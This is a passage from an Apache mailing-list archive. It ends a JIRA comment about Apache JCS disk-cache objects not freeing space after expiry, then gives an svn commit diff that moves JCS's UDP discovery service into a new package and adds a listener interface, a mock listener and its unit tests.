looking at the log file, it has log message like "Exceeded maxLifeSeconds: key name". > I could not see above log message for the cached objects in disk after 60 seconds. I believe that objects stored on disk never get deleted but the surprise thing is if i try to access the cached object in disk after 60 seconds, it is returning null, that means the object has expired. But JCS is not deallocating the memory occupied by that expired object. > Is it possible to deallocate that memory occupied when the object gets expired? I thought of asking this as I need to cache lot of data. If I am not able to deallocate the memory , the file size gets increased and might get exception. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 16 20:14:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39966 invoked from network); 16 Jul 2009 20:14:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 20:14:08 -0000 Received: (qmail 26407 invoked by uid 500); 16 Jul 2009 20:15:13 -0000 Delivered-To: [email protected] Received: (qmail 26354 invoked by uid 500); 16 Jul 2009 20:15:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 26344 invoked by uid 500); 16 Jul 2009 20:15:13 -0000 Delivered-To: [email protected] Received: (qmail 26341 invoked by uid 500); 16 Jul 2009 20:15:13 -0000 Delivered-To: [email protected] Received: (qmail 26338 invoked by uid 99); 16 Jul 2009 20:15:13 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:15:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:15:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4E6A223889DA; Thu, 16 Jul 2009 20:14:44 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r794825 [2/2] - in /jakarta/jcs/trunk/src: java/org/apache/jcs/auxiliary/lateral/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/ java/org/apache/jcs/auxiliary/lateral/socket/tcp... Date: Thu, 16 Jul 2009 20:14:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java (from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -21,24 +21,18 @@ import java.net.UnknownHostException; import java.util.ArrayList; -import java.util.HashMap; import java.util.Iterator; -import java.util.Map; import java.util.Set; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; -import org.apache.jcs.auxiliary.lateral.LateralCacheNoWait; -import org.apache.jcs.auxiliary.lateral.LateralCacheNoWaitFacade; -import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; -import org.apache.jcs.engine.behavior.ICompositeCacheManager; -import org.apache.jcs.engine.behavior.IElementSerializer; -import org.apache.jcs.engine.behavior.IShutdownObservable; import org.apache.jcs.engine.behavior.IShutdownObserver; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; +import org.apache.jcs.utils.discovery.behavior.IDiscoveryListener; import org.apache.jcs.utils.net.HostNameUtil; import EDU.oswego.cs.dl.util.concurrent.ClockDaemon; +import EDU.oswego.cs.dl.util.concurrent.CopyOnWriteArraySet; import EDU.oswego.cs.dl.util.concurrent.ThreadFactory; /** @@ -47,6 +41,7 @@ * It also creates a sender that periodically broadcasts its availability. * <p> * The sender also broadcasts a request for other caches to broadcast their addresses. + * <p> * @author Aaron Smuts */ public class UDPDiscoveryService @@ -64,61 +59,39 @@ /** the runanble that the receiver thread runs */ private UDPDiscoveryReceiver receiver; - /** Map of facades */ - private Map facades = new HashMap(); - /** the runnanble that sends messages via the clock daemon */ private UDPDiscoverySenderThread sender = null; - /** The host address */ - private String hostAddress = "unknown"; - - /** THe udp address */ - private String discoveryAddress; + /** removes things that have been idle for too long */ + private UDPCleanupRunner cleanup; - /** The port to braodcast to. */ - private int discoveryPort; + /** attributes */ + private UDPDiscoveryAttributes udpDiscoveryAttributes = null; - /** - * the port this service runs on, the service we are telling other about. we should have a - * service info object instead - */ - private int servicePort; + /** is this shut down? */ + private boolean shutdown = false; - /** Attributes for creating new instances. */ - private ITCPLateralCacheAttributes tcpLateralCacheAttributes; + /** This is a set of services that have been discovered. */ + private Set discoveredServices = new CopyOnWriteArraySet(); - /** The event logger. */ - protected ICacheEventLogger cacheEventLogger; + /** This a list of regions that are configured to use discovery. */ + private Set cacheNames = new CopyOnWriteArraySet(); - /** The serializer. */ - protected IElementSerializer elementSerializer; + /** handles add and remove. consider making into a set. */ + private IDiscoveryListener discoveryListener; /** - * @param discoveryAddress address to multicast to - * @param discoveryPort port to multicast to - * @param servicePort the port this service runs on, the service we are telling other about - * @param cacheMgr + * @param attributes * @param cacheEventLogger - * @param elementSerializer */ - public UDPDiscoveryService( String discoveryAddress, int discoveryPort, int servicePort, - ICompositeCacheManager cacheMgr, ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) - { - // register for shutdown notification - ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( this ); - - this.setDiscoveryAddress( discoveryAddress ); - this.setDiscoveryPort( discoveryPort ); - this.setServicePort( servicePort ); - this.cacheEventLogger = cacheEventLogger; - this.elementSerializer = elementSerializer; + public UDPDiscoveryService( UDPDiscoveryAttributes attributes, ICacheEventLogger cacheEventLogger ) + { + udpDiscoveryAttributes = (UDPDiscoveryAttributes) attributes.clone(); try { // todo, you should be able to set this - hostAddress = HostNameUtil.getLocalHostAddress(); + udpDiscoveryAttributes.setServiceAddress( HostNameUtil.getLocalHostAddress() ); } catch ( UnknownHostException e1 ) { @@ -128,8 +101,8 @@ try { // todo need some kind of recovery here. - receiver = new UDPDiscoveryReceiver( this, getDiscoveryAddress(), getDiscoveryPort(), cacheMgr, - cacheEventLogger, elementSerializer ); + receiver = new UDPDiscoveryReceiver( this, getUdpDiscoveryAttributes().getUdpDiscoveryAddr(), + getUdpDiscoveryAttributes().getUdpDiscoveryPort() ); udpReceiverThread = new Thread( receiver ); udpReceiverThread.setDaemon( true ); // udpReceiverThread.setName( t.getName() + "--UDPReceiver" ); @@ -137,11 +110,12 @@ } catch ( Exception e ) { - log.error( "Problem creating UDPDiscoveryReceiver, address [" + getDiscoveryAddress() + "] port [" - + getDiscoveryPort() + "] we won't be able to find any other caches", e ); + log.error( "Problem creating UDPDiscoveryReceiver, address [" + + getUdpDiscoveryAttributes().getUdpDiscoveryAddr() + "] port [" + + getUdpDiscoveryAttributes().getUdpDiscoveryPort() + "] we won't be able to find any other caches", e ); } - // todo only do the passive if receive is inenabled, perhaps set the + // todo only do the passive if receive is enabled, perhaps set the // myhost to null or something on the request if ( senderDaemon == null ) { @@ -150,75 +124,25 @@ } // create a sender thread - sender = new UDPDiscoverySenderThread( getDiscoveryAddress(), getDiscoveryPort(), hostAddress, this - .getServicePort(), this.getCacheNames() ); + sender = new UDPDiscoverySenderThread( getUdpDiscoveryAttributes(), this.getCacheNames() ); senderDaemon.executePeriodically( 30 * 1000, sender, false ); - } - - /** - * Adds a nowait facade under this cachename. If one already existed, it will be overridden. - * <p> - * When a broadcast is received from the UDP Discovery receiver, for each cacheName in the - * message, the add no wait will be called here. To add a no wait, the facade is looked up for - * this cache name. - * @param facade - * @param cacheName - * @return true if the facade was not already registered. - */ - public synchronized boolean addNoWaitFacade( LateralCacheNoWaitFacade facade, String cacheName ) - { - boolean isNew = !facades.containsKey( cacheName ); - - // override or put anew, it doesn't matter - facades.put( cacheName, facade ); - - if ( isNew ) - { - if ( sender != null ) - { - // need to reset the cache names since we have a new one - sender.setCacheNames( this.getCacheNames() ); - } - } - return isNew; - } - - /** - * This adds nowaits to a facde for the region name. If the region has no facade, then it is not - * configured to use the lateral cache, and no facde will be created. - * @param noWait - */ - protected void addNoWait( LateralCacheNoWait noWait ) - { - LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); - if ( log.isDebugEnabled() ) - { - log.debug( "Got facade for " + noWait.getCacheName() + " = " + facade ); - } - - if ( facade != null ) - { - boolean isNew = facade.addNoWait( noWait ); - if ( log.isDebugEnabled() ) - { - log.debug( "Called addNoWait, isNew = " + isNew ); - } - } - else - { - if ( log.isInfoEnabled() ) - { - log.info( "Different nodes are configured differently. Region [" + noWait.getCacheName() - + "] is not configured to use the lateral cache." ); - } - } + // add the cleanup daemon too + cleanup = new UDPCleanupRunner( this ); + // I'm going to use this as both, but it could happen + // that something could hang around twice the time suing this as the + // delay and the idle time. + senderDaemon.executePeriodically( this.getUdpDiscoveryAttributes().getMaxIdleTimeSec() * 1000, cleanup, false ); + + // add shutdown hook that will issue a remove call. + DiscoveryShutdownHook shutdownHook = new DiscoveryShutdownHook( this ); + Runtime.getRuntime().addShutdownHook( shutdownHook ); } /** * Send a passive broadcast in response to a request broadcast. Never send a request for a - * request. We can respond to our own reques, since a request broadcast is not intended as a + * request. We can respond to our own requests, since a request broadcast is not intended as a * connection request. We might want to only send messages, so we would send a request, but * never a passive broadcast. */ @@ -229,9 +153,11 @@ { // create this connection each time. // more robust - sender = new UDPDiscoverySender( getDiscoveryAddress(), getDiscoveryPort() ); + sender = new UDPDiscoverySender( getUdpDiscoveryAttributes().getUdpDiscoveryAddr(), + getUdpDiscoveryAttributes().getUdpDiscoveryPort() ); - sender.passiveBroadcast( hostAddress, this.getServicePort(), this.getCacheNames() ); + sender.passiveBroadcast( getUdpDiscoveryAttributes().getServiceAddress(), getUdpDiscoveryAttributes() + .getServicePort(), this.getCacheNames() ); // todo we should consider sending a request broadcast every so // often. @@ -243,8 +169,9 @@ } catch ( Exception e ) { - log.error( "Problem calling the UDP Discovery Sender. address [" + getDiscoveryAddress() + "] port [" - + getDiscoveryPort() + "]", e ); + log.error( "Problem calling the UDP Discovery Sender. address [" + + getUdpDiscoveryAttributes().getUdpDiscoveryAddr() + "] port [" + + getUdpDiscoveryAttributes().getUdpDiscoveryPort() + "]", e ); } finally { @@ -263,21 +190,102 @@ } /** + * Adds a region to the list that is participating in discovery. + * <p> + * @param cacheName + */ + public void addParticipatingCacheName( String cacheName ) + { + cacheNames.add( cacheName ); + sender.setCacheNames( getCacheNames() ); + } + + /** + * Removes the discovered service from the list and calls the discovery listener. + * <p> + * @param service + */ + public void removeDiscoveredService( DiscoveredService service ) + { + getDiscoveredServices().remove( service ); + getDiscoveryListener().removeDiscoveredService( service ); + } + + /** + * Add a service to the list. Update the held copy if we already know about it. + * <p> + * @param discoveredService discovered service + */ + protected void addOrUpdateService( DiscoveredService discoveredService ) + { + // Since this is a set we can add it over an over. + // We want to replace the old one, since we may add info that is not part of the equals. + // The equals method on the object being added is intentionally restricted. + if ( !getDiscoveredServices().contains( discoveredService ) ) + { + if ( log.isInfoEnabled() ) + { + log.info( "Set does not contain service. I discovered " + discoveredService ); + } + if ( log.isDebugEnabled() ) + { + log.debug( "Adding service in the set " + discoveredService ); + } + getDiscoveredServices().add( discoveredService ); + + // todo update some list of cachenames + getDiscoveryListener().addDiscoveredService( discoveredService ); + } + else + { + if ( log.isDebugEnabled() ) + { + log.debug( "Set contains service." ); + } + if ( log.isDebugEnabled() ) + { + log.debug( "Updating service in the set " + discoveredService ); + } + Iterator it = getDiscoveredServices().iterator(); + // need to update the time this sucks. add has no effect convert to a map + while ( it.hasNext() ) + { + DiscoveredService service1 = (DiscoveredService) it.next(); + if ( discoveredService.equals( service1 ) ) + { + service1.setLastHearFromTime( discoveredService.getLastHearFromTime() ); + break; + } + } + } + } + + /** * Get all the cache names we have facades for. * <p> * @return ArrayList */ protected ArrayList getCacheNames() { - ArrayList keys = new ArrayList(); - Set keySet = facades.keySet(); - Iterator it = keySet.iterator(); - while ( it.hasNext() ) - { - String key = (String) it.next(); - keys.add( key ); - } - return keys; + ArrayList names = new ArrayList(); + names.addAll( cacheNames ); + return names; + } + + /** + * @param attr The UDPDiscoveryAttributes to set. + */ + public void setUdpDiscoveryAttributes( UDPDiscoveryAttributes attr ) + { + this.udpDiscoveryAttributes = attr; + } + + /** + * @return Returns the lca. + */ + public UDPDiscoveryAttributes getUdpDiscoveryAttributes() + { + return this.udpDiscoveryAttributes; } /** @@ -310,99 +318,104 @@ */ public void shutdown() { - if ( log.isInfoEnabled() ) + if ( !shutdown ) { - log.info( "Shutting down UDP discovery service receiver." ); - } + shutdown = true; - try - { - // no good way to do this right now. - receiver.shutdown(); - udpReceiverThread.interrupt(); - } - catch ( Exception e ) - { - log.error( "Problem interrupting UDP receiver thread." ); - } + if ( log.isInfoEnabled() ) + { + log.info( "Shutting down UDP discovery service receiver." ); + } - if ( log.isInfoEnabled() ) - { - log.info( "Shutting down UDP discovery service sender." ); - } + try + { + // no good way to do this right now. + receiver.shutdown(); + udpReceiverThread.interrupt(); + } + catch ( Exception e ) + { + log.error( "Problem interrupting UDP receiver thread." ); + } - try - { - // interrupt all the threads. - senderDaemon.shutDown(); + if ( log.isInfoEnabled() ) + { + log.info( "Shutting down UDP discovery service sender." ); + } + + try + { + // interrupt all the threads. + senderDaemon.shutDown(); + } + catch ( Exception e ) + { + log.error( "Problem shutting down UDP sender." ); + } + + // also call the shutdown on the sender thread itself, which + // will result in a remove command. + try + { + sender.shutdown(); + } + catch ( Exception e ) + { + log.error( "Problem issuing remove broadcast via UDP sender." ); + } } - catch ( Exception e ) + else { - log.error( "Problem shutting down UDP sender." ); + if ( log.isDebugEnabled() ) + { + log.debug( "Shutdown already called." ); + } } } /** - * @param discoveryAddress The discoveryAddress to set. - */ - protected void setDiscoveryAddress( String discoveryAddress ) - { - this.discoveryAddress = discoveryAddress; - } - - /** - * @return Returns the discoveryAddress. - */ - protected String getDiscoveryAddress() - { - return discoveryAddress; - } - - /** - * @param discoveryPort The discoveryPort to set. + * Call shutdown to be safe. + * <p> + * @throws Throwable on error */ - protected void setDiscoveryPort( int discoveryPort ) + public void finalize() + throws Throwable { - this.discoveryPort = discoveryPort; - } + super.finalize(); - /** - * @return Returns the discoveryPort. - */ - protected int getDiscoveryPort() - { - return discoveryPort; + // TODO reconsider this, since it uses the logger + shutdown(); } /** - * @param servicePort The servicePort to set. + * @param discoveredServices The discoveredServices to set. */ - protected void setServicePort( int servicePort ) + public synchronized void setDiscoveredServices( Set discoveredServices ) { - this.servicePort = servicePort; + this.discoveredServices = discoveredServices; } /** - * @return Returns the servicePort. + * @return Returns the discoveredServices. */ - protected int getServicePort() + public synchronized Set getDiscoveredServices() { - return servicePort; + return discoveredServices; } /** - * @param tCPLateralCacheAttributes The tCPLateralCacheAttributes to set. + * @param discoveryListener the discoveryListener to set */ - public void setTcpLateralCacheAttributes( ITCPLateralCacheAttributes tCPLateralCacheAttributes ) + public void setDiscoveryListener( IDiscoveryListener discoveryListener ) { - tcpLateralCacheAttributes = tCPLateralCacheAttributes; + this.discoveryListener = discoveryListener; } /** - * @return Returns the tCPLateralCacheAttributes. + * @return the discoveryListener */ - public ITCPLateralCacheAttributes getTcpLateralCacheAttributes() + public IDiscoveryListener getDiscoveryListener() { - return tcpLateralCacheAttributes; + return discoveryListener; } } Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.4 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java ------------------------------------------------------------------------------ svn:mergeinfo = Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,25 @@ +package org.apache.jcs.utils.discovery.behavior; + +import org.apache.jcs.utils.discovery.DiscoveredService; + +/** + * Interface for things that want to listen to discovery events. This will allow discovery to be + * used outside of the TCP lateral. + */ +public interface IDiscoveryListener +{ + /** + * Add the service if needed. This does not necessarily mean that the service is not already + * added. This can be called if there is a change. + * <p> + * @param service the service to add + */ + public void addDiscoveredService( DiscoveredService service ); + + /** + * Remove the service from the list. + * <p> + * @param service the service to remove + */ + public void removeDiscoveredService( DiscoveredService service ); +} Modified: jakarta/jcs/trunk/src/test-conf/log4j.properties URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test-conf/log4j.properties?rev=794825&r1=794824&r2=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test-conf/log4j.properties (original) +++ jakarta/jcs/trunk/src/test-conf/log4j.properties Thu Jul 16 20:14:42 2009 @@ -28,6 +28,7 @@ log4j.category.org.apache.jcs.auxiliary.lateral=INFO log4j.category.org.apache.jcs.utils.struct=INFO log4j.category.org.apache.jcs.utils.threadpool=INFO +log4j.category.org.apache.jcs.utils.discovery=DEBUG log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout Copied: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java (from r781592, jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/MockLateralCache.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java?p2=jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java&p1=jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/MockLateralCache.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/MockLateralCache.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.auxiliary.lateral.socket.tcp; /* * Licensed to the Apache Software Foundation (ASF) under one Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.2 Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java ------------------------------------------------------------------------------ svn:mergeinfo = Added: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,35 @@ +package org.apache.jcs.utils.discovery; + +import java.util.ArrayList; +import java.util.List; + +import org.apache.jcs.utils.discovery.behavior.IDiscoveryListener; + +/** Mock listener, for testing. */ +public class MockDiscoveryListener + implements IDiscoveryListener +{ + /** discovered services. */ + public List discoveredServices = new ArrayList(); + + /** + * Adds the entry to a list. I'm not using a set. I want to see if we get dupes. + * <p> + * @param service + */ + public void addDiscoveredService( DiscoveredService service ) + { + discoveredServices.add( service ); + } + + /** + * Removes it from the list. + * <p> + * @param service + */ + public void removeDiscoveredService( DiscoveredService service ) + { + discoveredServices.remove( service ); + } + +} Added: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,130 @@ +package org.apache.jcs.utils.discovery; + +import java.util.ArrayList; + +import junit.framework.TestCase; + +/** + * Tests for the sender. + */ +public class UDPDiscoverySenderUnitTest + extends TestCase +{ + /** multicast address to send/receive on */ + private static final String ADDRESS = "161.129.204.104"; + + /** multicast address to send/receive on */ + private static final int PORT = 5555; + + /** imaginary host address for sending */ + private static final String SENDING_HOST = "imaginary host address"; + + /** imaginary port for sending */ + private static final int SENDING_PORT = 1; + + /** receiver instance for tests */ + private UDPDiscoveryReceiver receiver; + + /** sender instance for tests */ + private UDPDiscoverySender sender; + + /** + * Set up the receiver. Maybe better to just code sockets here? Set up the sender for sending + * the message. + * <p> + * @throws Exception on error + */ + protected void setUp() + throws Exception + { + super.setUp(); + receiver = new UDPDiscoveryReceiver( null, ADDRESS, PORT ); + sender = new UDPDiscoverySender( ADDRESS, PORT ); + } + + /** + * Kill off the sender and receiver. + * <p> + * @throws Exception on error + */ + protected void tearDown() + throws Exception + { + receiver.shutdown(); + sender.destroy(); + super.tearDown(); + } + + /** + * Test sending a live messages. + * <p> + * @throws Exception on error + */ + public void testPassiveBroadcast() + throws Exception + { + // SETUP + ArrayList cacheNames = new ArrayList(); + + // DO WORK + sender.passiveBroadcast( SENDING_HOST, SENDING_PORT, cacheNames, 1L ); + + // VERIFY + // grab the sent message + Object obj = receiver.waitForMessage() ; + + assertTrue( "unexpected crap received", obj instanceof UDPDiscoveryMessage ); + + UDPDiscoveryMessage msg = (UDPDiscoveryMessage) obj; + assertEquals( "wrong host", SENDING_HOST, msg.getHost() ); + assertEquals( "wrong port", SENDING_PORT, msg.getPort() ); + assertEquals( "wrong message type", UDPDiscoveryMessage.PASSIVE_BROADCAST, msg.getMessageType() ); + } + + /** + * Test sending a remove broadcast. + * <p> + * @throws Exception on error + */ + public void testRemoveBroadcast() + throws Exception + { + // SETUP + ArrayList cacheNames = new ArrayList(); + + // DO WORK + sender.removeBroadcast( SENDING_HOST, SENDING_PORT, cacheNames, 1L ); + + // VERIFY + // grab the sent message + Object obj = receiver.waitForMessage(); + + assertTrue( "unexpected crap received", obj instanceof UDPDiscoveryMessage ); + + UDPDiscoveryMessage msg = (UDPDiscoveryMessage) obj; + assertEquals( "wrong host", SENDING_HOST, msg.getHost() ); + assertEquals( "wrong port", SENDING_PORT, msg.getPort() ); + assertEquals( "wrong message type", UDPDiscoveryMessage.REMOVE_BROADCAST, msg.getMessageType() ); + } + + /** + * Test sending a request broadcast. + * <p> + * @throws Exception on error + */ + public void testRequestBroadcast() + throws Exception + { + // DO WORK + sender.requestBroadcast(); + + // VERIFY + // grab the sent message + Object obj = receiver.waitForMessage(); + + assertTrue( "unexpected crap received", obj instanceof UDPDiscoveryMessage ); + + UDPDiscoveryMessage msg = (UDPDiscoveryMessage) obj; + assertEquals( "wrong message type", UDPDiscoveryMessage.REQUEST_BROADCAST, msg.getMessageType() ); + } +} Added: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,138 @@ +package org.apache.jcs.utils.discovery; + +import java.util.ArrayList; +import java.util.Iterator; + +import junit.framework.TestCase; + +import org.apache.jcs.auxiliary.MockCacheEventLogger; + +/** Unit tests for the service. */ +public class UDPDiscoveryServiceUnitTest + extends TestCase +{ + /** Verify that the list is updated. */ + public void testAddOrUpdateService_NotInList() + { + // SETUP + String host = "161.129.204.104"; + int port = 6789; + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( host ); + attributes.setUdpDiscoveryPort( port ); + attributes.setServicePort( 1000 ); + + // create the service + UDPDiscoveryService service = new UDPDiscoveryService( attributes, new MockCacheEventLogger() ); + service.addParticipatingCacheName( "testCache1" ); + + MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); + service.setDiscoveryListener( discoveryListener ); + + DiscoveredService discoveredService = new DiscoveredService(); + discoveredService.setServiceAddress( host ); + discoveredService.setCacheNames( new ArrayList() ); + discoveredService.setServicePort( 1000 ); + discoveredService.setLastHearFromTime( 100 ); + + // DO WORK + service.addOrUpdateService( discoveredService ); + + // VERIFY + assertTrue( "Service should be in the service list.", service.getDiscoveredServices() + .contains( discoveredService ) ); + assertTrue( "Service should be in the listener list.", discoveryListener.discoveredServices + .contains( discoveredService ) ); + } + + /** Verify that the list is updated. */ + public void testAddOrUpdateService_InList() + { + // SETUP + String host = "161.129.204.104"; + int port = 6789; + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( host ); + attributes.setUdpDiscoveryPort( port ); + attributes.setServicePort( 1000 ); + + // create the service + UDPDiscoveryService service = new UDPDiscoveryService( attributes, new MockCacheEventLogger() ); + service.addParticipatingCacheName( "testCache1" ); + + MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); + service.setDiscoveryListener( discoveryListener ); + + DiscoveredService discoveredService = new DiscoveredService(); + discoveredService.setServiceAddress( host ); + discoveredService.setCacheNames( new ArrayList() ); + discoveredService.setServicePort( 1000 ); + discoveredService.setLastHearFromTime( 100 ); + + DiscoveredService discoveredService2 = new DiscoveredService(); + discoveredService2.setServiceAddress( host ); + discoveredService2.setCacheNames( new ArrayList() ); + discoveredService2.setServicePort( 1000 ); + discoveredService2.setLastHearFromTime( 500 ); + + // DO WORK + service.addOrUpdateService( discoveredService ); + // again + service.addOrUpdateService( discoveredService2 ); + + // VERIFY + assertEquals( "Should only be one in the set.", 1, service.getDiscoveredServices().size() ); + assertTrue( "Service should be in the service list.", service.getDiscoveredServices() + .contains( discoveredService ) ); + assertTrue( "Service should be in the listener list.", discoveryListener.discoveredServices + .contains( discoveredService ) ); + + Iterator it = service.getDiscoveredServices().iterator(); + // need to update the time this sucks. add has no effect convert to a map + while ( it.hasNext() ) + { + DiscoveredService service1 = (DiscoveredService) it.next(); + if ( discoveredService.equals( service1 ) ) + { + assertEquals( "The match should have the new last heard from time.", service1.getLastHearFromTime(), + discoveredService2.getLastHearFromTime() ); + } + } + } + + /** Verify that the list is updated. */ + public void testRemoveDiscoveredService() + { + // SETUP + String host = "161.129.204.104"; + int port = 6789; + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( host ); + attributes.setUdpDiscoveryPort( port ); + attributes.setServicePort( 1000 ); + + // create the service + UDPDiscoveryService service = new UDPDiscoveryService( attributes, new MockCacheEventLogger() ); + service.addParticipatingCacheName( "testCache1" ); + + MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); + service.setDiscoveryListener( discoveryListener ); + + DiscoveredService discoveredService = new DiscoveredService(); + discoveredService.setServiceAddress( host ); + discoveredService.setCacheNames( new ArrayList() ); + discoveredService.setServicePort( 1000 ); + discoveredService.setLastHearFromTime( 100 ); + + 